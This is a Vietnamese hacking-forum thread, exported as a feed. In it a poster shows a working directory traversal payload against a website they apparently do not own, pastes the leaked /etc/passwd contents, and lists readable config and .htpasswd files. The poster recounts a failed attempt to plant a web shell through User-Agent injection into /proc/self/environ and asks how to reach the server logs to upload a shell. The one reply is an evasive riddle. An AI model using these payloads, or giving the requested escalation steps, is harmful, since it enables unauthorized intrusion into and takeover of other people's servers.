<![CDATA[Latest posts for the topic "Giúp em về lỗi Directory Traversal"]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net Giúp em về lỗi Directory Traversal domain.com?bvrrp=../../../../../../../../../../etc/passwd  Trang web nó không báo lỗi gì cả, nhưng khi "View Page Source" sẽ thấy thông tin file đó :
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:499:499::/etc/abrt:/sbin/nologin ........và còn nhiều nữa...... 
Do e dùng tools Acunetix 8 nên mới biết đó là lỗi Directory Traversal :( . Qua tìm hiểu cách up shell vào những site này thì up qua add on User Agent của Fire Fox, e đã thử và thất bại :(. Nguyên nhân là cái server của e là Apache , không có đường dẫn : /proc/self/environ nên không up shell qua nó được ạ. Qua bài viết Code:
/hvaonline/posts/list/36793.html
Em thấy có đề cập đến vấn đề là qua file log, nhưng e tìm suốt mà không thấy nó ở đâu :( , mặc dù thay bvrrp=../../../../../../../../../../etc/passwd bằng các file muốn view đều được hết ../etc/passwd, /etc/group, httpd.conf, .htaccess, .htpasswd ................. Các a/c cho e hỏi là liệu site này e có thể up được shell không ?, nếu up được thì phải làm như thế nào ạ ? mong a chị giúp đỡ e. Em cảm ơn ạ !]]>
/hvaonline/posts/list/45172.html#278512 /hvaonline/posts/list/45172.html#278512 GMT
Giúp em về lỗi Directory Traversal /hvaonline/posts/list/45172.html#278517 /hvaonline/posts/list/45172.html#278517 GMT Giúp em về lỗi Directory Traversal

chiro8x wrote:
Có một câu hỏi này, nếu bạn giải đáp nó thì đồng thời bạn cũng giải đáp luôn vấn đề bạn đang gặp phải. "Có một cây cổ thụ, người ta có thể tính tuổi cây dựa trên số vân sáng tối. Một vân sáng và một vân tối là một năm. Có 432 vân sáng, 431 vân tối. Hỏi ai là người chặt cây ?." 
E không hiểu ý của a lắm ạ, từ vân cây xong lại hỏi là ai chặt ? ngoài con người ra thì ai chặt vào đây dc :(. cái site này e đặt bnhiu hy vọng vào nó. mong rằng câu trả lời k phải là : bó tay #:S ]]>
/hvaonline/posts/list/45172.html#278518 /hvaonline/posts/list/45172.html#278518 GMT